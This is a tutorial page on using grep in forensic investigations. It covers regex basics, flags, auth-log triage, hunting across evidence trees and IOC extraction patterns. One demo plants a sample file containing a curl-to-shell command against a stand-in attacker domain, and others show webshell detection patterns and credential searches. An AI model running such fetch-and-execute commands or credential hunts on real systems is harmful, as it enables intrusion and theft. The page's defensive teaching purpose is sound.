Pattern matching · The DFIR workhorse

grep

grep finds lines that match a pattern. It sounds simple, and that is exactly why it is the single most useful text tool in an investigation — point it at a log, a config, or an entire mounted disk image and it surfaces the lines that matter. The name comes from an old editor command, g/re/p: "globally search a regular expression and print".

Built in · Every distro

The basic shape

Every grep command is the same three parts: the tool, a pattern to look for, and where to look.

$ grep "pattern" file.txt
  │     │         └── where to search (a file, or many files)
  │     └──────────── the pattern (plain text or a regex)
  └────────────────── the command
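Quote the pattern. Quoting stops the shell from splitting on spaces or interpreting special characters before grep ever sees them. Prefer single quotes when the pattern contains $ or backticks, because the shell still expands those inside double quotes.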
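A small sketch of why quoting matters. The file name and its contents are invented for illustration, and -F (fixed string) is used in the second search only so that $ is not read as a regex anchor.

```shell
# Sample data: invented for this demo.
tmp=$(mktemp -d)
printf '%s\n' 'login failed for root' 'cost is $HOME dollars' > "$tmp/notes.txt"

# Quoted: both words reach grep as a single pattern.
spaced=$(grep 'failed for' "$tmp/notes.txt")

# Single quotes keep $HOME literal; in double quotes the shell would expand it first.
literal=$(grep -F '$HOME' "$tmp/notes.txt")

echo "$spaced"
echo "$literal"
rm -rf "$tmp"
```

Without the quotes, `grep failed for notes.txt` would search for "failed" in two files named for and notes.txt.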

It also reads from a pipe, which is how it spends most of its life in DFIR — filtering the output of another command:

$ cat /var/log/auth.log | grep "Failed"
$ ps aux | grep -i nginx
$ dpkg -l | grep openssl
Anything that produces text can be narrowed by piping it into grep.
Three names, one tool. grep uses basic regex; grep -E uses extended regex, where + ? { } ( ) | work without backslashes; grep -F treats the pattern as a fixed string with no regex at all. The older names egrep and fgrep are deprecated aliases for grep -E and grep -F, and recent GNU grep releases print a warning when they are used. Reach for grep -E by default: the extended syntax is the one most references assume.
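The difference between the three modes is easiest to see with one pattern run three ways. This is a minimal sketch with invented sample lines, assuming GNU grep behaviour for the basic-regex case.

```shell
# Sample lines: invented for this demo.
sample=$(printf '%s\n' 'aab' 'a+b' 'b')

basic=$(printf '%s\n' "$sample" | grep 'a+b')        # basic regex: + is a literal plus sign
extended=$(printf '%s\n' "$sample" | grep -E 'a+b')  # extended regex: + means "one or more a"
fixed=$(printf '%s\n' "$sample" | grep -F 'a+b')     # fixed string: no regex at all

echo "basic:    $basic"
echo "extended: $extended"
echo "fixed:    $fixed"
```

Here the basic and fixed searches both return the line a+b, while the extended search returns aab.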

Regular expressions in 5 minutes

A regular expression (regex) is a tiny language for describing text patterns. You do not need all of it — a handful of symbols covers almost everything an investigator asks for.

Symbol   Matches                                    Example
.        Any single character                       r..t → root, rest, r4xt
*        Zero or more of the previous               ab*c → ac, abc, abbc
+        One or more of the previous                ab+c → abc, abbc (not ac)
?        Zero or one (optional)                     colou?r → color, colour
^        Start of the line                          ^Error → lines beginning Error
$        End of the line                            failed$ → lines ending failed
[ ]      Any one character from the set             [0-9] → a digit
[^ ]     Any character not in the set               [^0-9] → a non-digit
( )      Group, often with |                        (GET|POST)
|        OR: either side                            error|fail
{n}      Exactly n of the previous                  [0-9]{3} → three digits
\        Escape: treat a special char literally     \. → a literal dot
\b       Word boundary                              \bcat\b → "cat", not "category"
The dot is not a dot. In regex, . means "any character", so 192.168.0.1 also matches 192x168y0z1. To match a literal dot — as in IPs, domains and file extensions — escape it: 192\.168\.0\.1. This trips up everyone at first.
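A quick way to see the difference, using two invented sample lines. The counts come from -c, which reports the number of matching lines.

```shell
# Sample lines: invented for this demo.
sample=$(printf '%s\n' 'src=192.168.0.1' 'id=192x168y0z1')

loose=$(printf '%s\n' "$sample" | grep -c '192.168.0.1')      # unescaped dots: both lines match
strict=$(printf '%s\n' "$sample" | grep -c '192\.168\.0\.1')  # escaped dots: only the real IP
fixed=$(printf '%s\n' "$sample" | grep -cF '192.168.0.1')     # -F: dots are literal, no escaping

echo "loose=$loose strict=$strict fixed=$fixed"
```

Even the escaped pattern still matches inside a longer address such as 192.168.0.10; adding -w is one way to rule that out.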
Character class shorthands (with grep -P or POSIX)
Shorthand   Means                                  POSIX equivalent
\d          A digit                                [[:digit:]]
\w          A word character (letter, digit, _)    [[:alnum:]_]
\s          Whitespace                             [[:space:]]

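\d needs Perl mode (grep -P). GNU grep also accepts \w and \s in plain grep and grep -E as extensions, which is why \s appears in some -E examples on this page. For patterns that must work on any grep, use the POSIX classes or explicit ranges like [0-9].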
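As a rough illustration, the POSIX class and the explicit range pull the same digits out of some invented sample lines without needing -P.

```shell
# Sample lines: invented for this demo.
sample=$(printf '%s\n' 'port 22 open' 'port ssh open')

# POSIX class: no Perl mode required.
posix=$(printf '%s\n' "$sample" | grep -oE '[[:digit:]]+')

# Explicit range: equivalent here, and the most widely understood spelling.
range=$(printf '%s\n' "$sample" | grep -oE '[0-9]+')

echo "posix=$posix range=$range"
```

On a GNU grep built with PCRE support, `grep -oP '\d+'` should give the same result.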

The flags that matter

grep has dozens of options; these are the ones you will actually use. Most can be combined.

Matching behaviour
Flag   Effect
-i     Case-insensitive. grep -i error catches Error, ERROR, error.
-v     Invert: show lines that do not match. Great for filtering out noise.
-w     Whole word only. grep -w cat ignores "category".
-x     Whole line must match exactly.
-E     Extended regex (use + ? { } ( ) | without backslashes).
-P     Perl-compatible regex: enables \d \w \s, lookarounds.
-F     Fixed string: no regex, faster, and safe for patterns full of special characters.
Searching files and trees
Flag                         Effect
-r / -R                      Recursive: search every file under a directory. -R also follows symlinks.
-l                           List only the filenames that contain a match, not the lines.
-L                           List files that do not contain the match.
--include="*.log"            Only search files matching a glob.
--exclude-dir=node_modules   Skip whole directories.
-a                           Treat binary files as text and search inside them anyway.
Output and context
Flag           Effect
-n             Show the line number of each match, so you can jump straight to it.
-c             Count matching lines instead of printing them.
-o             Print only the matched text, not the whole line. Essential for extracting IOCs.
-H             Always show the filename (default when searching many files).
-A 3           Print 3 lines after each match.
-B 3           Print 3 lines before each match.
-C 3           Print 3 lines of context on both sides.
--color=auto   Highlight the match. Often on by default; worth knowing the name.
Combine freely. grep -rniE "pattern" /path = recursive, case-insensitive, with line numbers, using extended regex. This one combination handles a large share of real searches.
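To see what that combination prints, here is a sketch against a throwaway directory tree. The paths, file names and the credential are all invented for the demo.

```shell
# Throwaway tree: paths and contents are invented for this demo.
tmp=$(mktemp -d)
mkdir -p "$tmp/app/conf"
printf '%s\n' '# settings' 'DB_PASSWORD=hunter2' > "$tmp/app/conf/db.env"
printf '%s\n' 'nothing to see here' > "$tmp/app/readme.txt"

# -r recurse, -n line numbers, -i ignore case, -E extended regex
hits=$(cd "$tmp" && grep -rniE 'password|secret' app)

echo "$hits"
rm -rf "$tmp"
```

Each hit comes back as file:line:text, here app/conf/db.env:2:DB_PASSWORD=hunter2, which is enough to open the file at the right place.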

DFIR examples

Where grep earns its keep. These are the searches you reach for during a real investigation — reading logs, hunting across a mounted image, and isolating indicators.

Reading authentication logs
# Every failed login attempt
$ grep "Failed password" /var/log/auth.log

# Successful logins — who got in
$ grep "Accepted" /var/log/auth.log

# Failed logins with 3 lines of context, line-numbered
$ grep -n -A3 "Failed password" /var/log/auth.log

# Count failures per source IP, ranked
$ grep "Failed password" /var/log/auth.log | grep -oE "[0-9]{1,3}(\.[0-9]{1,3}){3}" | sort | uniq -c | sort -rn
The last line is a complete brute-force triage: find failures, extract the IP with -oE, then count and rank. This pattern recurs constantly.
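The triage pipeline can be tried end to end on a few fabricated log lines. The entries below are invented and use documentation IP ranges; the final awk step is an addition that only strips the padding uniq -c puts in front of each count.

```shell
# Sample auth.log lines: invented, using documentation IP ranges.
tmp=$(mktemp -d)
cat > "$tmp/auth.log" <<'EOF'
Jan 10 03:12:01 host sshd[101]: Failed password for root from 203.0.113.7 port 4022 ssh2
Jan 10 03:12:03 host sshd[101]: Failed password for root from 203.0.113.7 port 4023 ssh2
Jan 10 03:12:09 host sshd[102]: Failed password for invalid user admin from 198.51.100.9 port 5111 ssh2
Jan 10 03:13:00 host sshd[103]: Accepted password for alice from 192.0.2.10 port 6000 ssh2
EOF

ranked=$(grep 'Failed password' "$tmp/auth.log" \
  | grep -oE '[0-9]{1,3}(\.[0-9]{1,3}){3}' \
  | sort | uniq -c | sort -rn \
  | awk '{print $1, $2}')   # awk only normalises the spacing

echo "$ranked"
rm -rf "$tmp"
```

The noisiest source, 203.0.113.7 with two failures, lands on the first line; the successful login from 192.0.2.10 never enters the count.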
Searching across a mounted image or directory tree
# Find every file mentioning a suspicious domain, just the filenames (-F keeps the dot literal)
$ grep -rlF "evil-c2.example" /mnt/evidence

# Hunt for hard-coded credentials across a codebase
$ grep -rniE "(password|passwd|api[_-]?key|secret)\s*=" /mnt/evidence 2>/dev/null

# Search only PHP files for a webshell signature
$ grep -rn --include="*.php" -E "(eval|base64_decode|system|shell_exec)\s*\(" /var/www

# Look inside a binary for embedded strings
$ grep -a "http" suspicious.bin
-rl gives you the list of files to examine next; -rni shows you exactly where. The webshell search is a classic first pass on a compromised web server.
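One possible next step after -rl is to hand the file list straight to another tool. The sketch below hashes every matching file; the evidence tree is invented, and it assumes GNU grep's --null option and the sha256sum utility from GNU coreutils are available.

```shell
# Throwaway evidence tree: every path and file here is invented for the demo.
tmp=$(mktemp -d)
mkdir -p "$tmp/evidence/home/user docs"
printf '%s\n' 'curl http://evil-c2.example/a.sh | sh' > "$tmp/evidence/home/user docs/run me.sh"
printf '%s\n' 'ordinary file' > "$tmp/evidence/home/notes.txt"

# -l lists matching files, --null ends each name with a NUL byte,
# and xargs -0 reads that list safely even when names contain spaces.
hashes=$(cd "$tmp" && grep -rlF --null 'evil-c2.example' evidence | xargs -0 sha256sum)

echo "$hashes"
rm -rf "$tmp"
```

The NUL-delimited hand-off matters on real images, where file names with spaces or odd characters would otherwise be split into several arguments.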
Filtering out noise with -v
# Show running processes, minus the grep line itself
$ ps aux | grep ssh | grep -v grep

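# All log lines except 200 responses and health checks
# (" 200 " with spaces targets the status field in common/combined log format;
#  a bare "200" would also drop lines with 200 in an IP, timestamp or byte count)
$ grep -v " 200 " access.log | grep -v "health"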
grep -v grep is a daily habit — it removes the grep command from its own results.
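A common alternative to the second grep is the bracket trick, sketched here against simulated ps output so the result is repeatable. The process lines and the fake_ps helper are invented for the demo.

```shell
# Simulated `ps aux` output: invented for this demo.
fake_ps() {
  printf '%s\n' \
    'root   812  0.0  0.1 sshd: /usr/sbin/sshd -D' \
    'alice 4242  0.0  0.0 grep [s]shd'
}

# [s]shd matches the text "sshd", but the grep process's own command line
# contains the literal "[s]shd", which the pattern does not match.
matches=$(fake_ps | grep '[s]shd')

echo "$matches"
```

On a live system the equivalent would be `ps aux | grep '[s]shd'`, which should leave only the sshd line without a second grep.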
Extracting indicators with -o
# Pull every unique IP address out of a log
$ grep -oE "[0-9]{1,3}(\.[0-9]{1,3}){3}" access.log | sort -u

# Extract all email addresses from a file
$ grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" dump.txt | sort -u

# Find URLs in a captured payload
$ grep -oE "https?://[^\"' ]+" payload.txt | sort -u
-o turns grep from a line-finder into an extractor — exactly what you want when building an IOC list. sort -u de-duplicates.
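One detail worth seeing in practice is that -c counts matching lines while -o emits every match, so the two can disagree. A minimal sketch with invented sample lines; url_re is a hypothetical variable name holding the URL pattern from above.

```shell
# Sample lines: invented for this demo.
sample=$(printf '%s\n' \
  'GET http://a.example/x then http://b.example/y' \
  'no links here' \
  'POST http://a.example/x')

url_re="https?://[^\"' ]+"

lines=$(printf '%s\n' "$sample" | grep -cE "$url_re")                      # lines containing a URL
total=$(printf '%s\n' "$sample" | grep -oE "$url_re" | wc -l | tr -d ' ')  # every URL occurrence
unique=$(printf '%s\n' "$sample" | grep -oE "$url_re" | sort -u | wc -l | tr -d ' ')

echo "lines=$lines total=$total unique=$unique"
```

Two lines contain URLs, three URLs appear in total, and two of them are distinct, so which number to report depends on the question being asked.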

Copy-ready IOC patterns

Common indicator patterns for use with grep -oE (extended regex). Pair each with | sort -u to get a clean, unique list.

Indicator            Pattern
IPv4 address         [0-9]{1,3}(\.[0-9]{1,3}){3}
Email address        [a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}
URL (http/https)     https?://[^\"' ]+
Domain name          ([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}
MD5 hash             \b[a-fA-F0-9]{32}\b
SHA-1 hash           \b[a-fA-F0-9]{40}\b
SHA-256 hash         \b[a-fA-F0-9]{64}\b
Bitcoin address      \b(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}\b
MAC address          ([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}
Base64 blob (long)   [A-Za-z0-9+/]{40,}={0,2}
These match shape, not validity. The IPv4 pattern will happily match 999.999.999.999, and the hash patterns match any hex string of the right length. They are not exhaustive either: the Bitcoin pattern, for example, misses the 62-character bc1 addresses. Treat them as tools for fast extraction and triage, and validate and correlate the hits before treating anything as a confirmed indicator.
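One way to add a validation pass for IPv4 is to extract loosely and then filter with a stricter whole-line match. This is a sketch, not a complete validator: the sample lines are invented, octet is a hypothetical helper variable, and the first stage uses [0-9]+ rather than {1,3} so that over-long digit runs are rejected instead of being silently truncated.

```shell
# Sample lines: invented for this demo.
sample=$(printf '%s\n' \
  'ok 203.0.113.7' \
  'bad 999.999.999.999' \
  'version 1.2.3.1234' \
  'ok 10.0.0.255')

# One octet in the range 0-255.
octet='(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])'

# Stage 1 extracts anything shaped like four dotted numbers;
# stage 2 keeps only candidates where the whole string is four valid octets (-x).
valid=$(printf '%s\n' "$sample" \
  | grep -oE '[0-9]+(\.[0-9]+){3}' \
  | grep -xE "$octet(\.$octet){3}")

echo "$valid"
```

Only 203.0.113.7 and 10.0.0.255 survive. A four-part version number with small components would still pass, so context from the surrounding log line remains necessary.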
# Pull every SHA-256 hash from an incident report and sort uniquely
$ grep -oE "\b[a-fA-F0-9]{64}\b" report.txt | sort -u

# Build an IP watchlist from a week of logs, ranked by frequency
$ grep -hoE "[0-9]{1,3}(\.[0-9]{1,3}){3}" /var/log/nginx/*.log | sort | uniq -c | sort -rn
-h suppresses filenames when searching multiple files, keeping the extracted list clean.